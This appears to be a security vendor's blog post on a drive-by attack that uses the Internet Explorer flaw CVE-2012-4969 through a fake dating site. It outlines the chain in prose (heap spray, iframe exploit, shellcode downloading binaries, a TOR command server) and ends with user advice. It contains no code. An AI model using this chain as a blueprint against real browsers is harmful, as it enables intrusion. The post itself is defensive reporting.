A dating website, which resembles the popular Facebook design, has been prepped to attack visiting web surfers using the newly discovered vulnerability in Microsoft’s IE 6 to 9 browsers. The vulnerability is described in CVE-2012-4969.
Even the German Federal Office for Information Security (BSI) has warned German citizens not to use Microsoft’s browser until the software vendor issued a security update and therefore rated the 0-day as a severe problem.
The current case
A detailed analysis of the current case will follow soon!
So far we can say the following:
- The initial site uses a highly obfuscated JavaScript that prepares the memory for the attack using a Heap Spray if the visiting computer uses IE 8.x in Windows.
The Heap Spray code was detected by G Data as JS:Exploit.JS.Agent.AR.
⇒ This method, using JavaScript, differs from the initial PoC. The PoC used Flash to prepare the memory, as a fellow researcher initially pointed out. - An embedded iframe (URL on the same domain) loads the 0-day exploit.
The exploit was detected by G Data as JS:CVE-2012-4969-A [Expl]. - The shellcode downloads a binary from the same server and executes it.
- This file downloads another binary from this server and also executes it.
- This second binary seems to be a normal TOR client, connecting to a TOR hidden service acting as the Command and Control server.
Microsoft has reacted quickly and issued instructions on how to apply mitigating factors, a Fix it and an update for the Internet Explorer versions within a short period of time!
What do we learn from that?
- The 0-day exploit has been accepted and adapted by the underground community!
- The Flash file is no longer an essential part of the preparation for the exploit.
- The quality of the payloads suggests that it is not the work of script kiddies.
- We suspect that it won’t take long before attackers include the attack into exploit packs.
What you can do:
- Install the update Microsoft released on 21 September 2012!
- Remain suspicious – Do not click on links or file attachments in emails and social networks without pausing to think first. The files or website could be infected with malicious code. If a message from a friend seems strange, users should first check if it is authentic.
- Use an up-to-date, comprehensive security solution with a virus scanner, firewall, web and real-time protection. A spam filter that protects you from unwanted spam mails also makes sense.
Want information about the analyzed website and samples? Contact: samplerequest [at] gdata.de